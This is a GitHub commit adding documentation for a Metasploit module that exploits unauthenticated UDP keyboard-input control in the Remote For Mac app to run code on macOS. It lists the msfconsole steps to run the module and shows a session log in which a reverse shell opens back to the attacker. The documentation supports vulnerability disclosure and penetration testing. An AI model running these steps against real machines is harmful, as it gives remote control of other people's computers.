Skip to content

Commit b177507

Browse files
committed
Adds docs
1 parent f9b8a9b commit b177507

File tree

1 file changed

+43
-0
lines changed

1 file changed

+43
-0
lines changed
Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
## Vulnerable Application
2+
3+
The Remote For Mac app is a remote control software that allows you to turn your iPhone or iPad into a wireless remote controller for Mac.
4+
The versions up to 2025.7 are vulnerable to unauthenticated UDP control.
5+
This allows an attacker to send a sequence of UDP packets to the target and simulate keyboard input,
6+
leaving an option for remote code execution.
7+
The app can be downloaded from [here](https://rs.ltd/).
8+
9+
10+
## Verification Steps
11+
12+
1. Install the application
13+
1. Start msfconsole
14+
1. Do: `use exploit/osx/misc/remote_for_mac_udp_rce`
15+
1. Do: `set RPORT [HTTP port of Remote For Mac]`
16+
1. Do: `set RHOST [target IP address]`
17+
1. Do: `set LHOST [attacker IP]`
18+
1. Do: `set LPORT [attacker port]`
19+
1. Do: `run`
20+
21+
## Options
22+
23+
### RPORT
24+
25+
The Remote For Mac spawn HTTPS server on semi-random port.
26+
The HTTP server provides information about running version and whether the authentication is enabled.
27+
The same port is also used for UDP protocol - this time, the port translated received packets into keyboard strokes.
28+
29+
## Scenarios
30+
31+
```
32+
msf6 exploit(osx/misc/remote_for_mac_udp_rce) > run verbose=true
33+
[*] Started reverse TCP handler on 192.168.168.217:4444
34+
[*] Simulating system keyboard input to open Terminal...
35+
[*] Initial sequence finished, waiting for terminal to be spawned..
36+
[*] Sending malicious payload to be executed...
37+
[+] Payload sent. Awaiting session...
38+
[*] Command shell session 3 opened (192.168.168.217:4444 -> 192.168.168.175:49197) at 2025-08-28 08:52:44 +0200
39+
40+
id
41+
uid=501(ms) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
42+
43+
```

0 commit comments

Comments
 (0)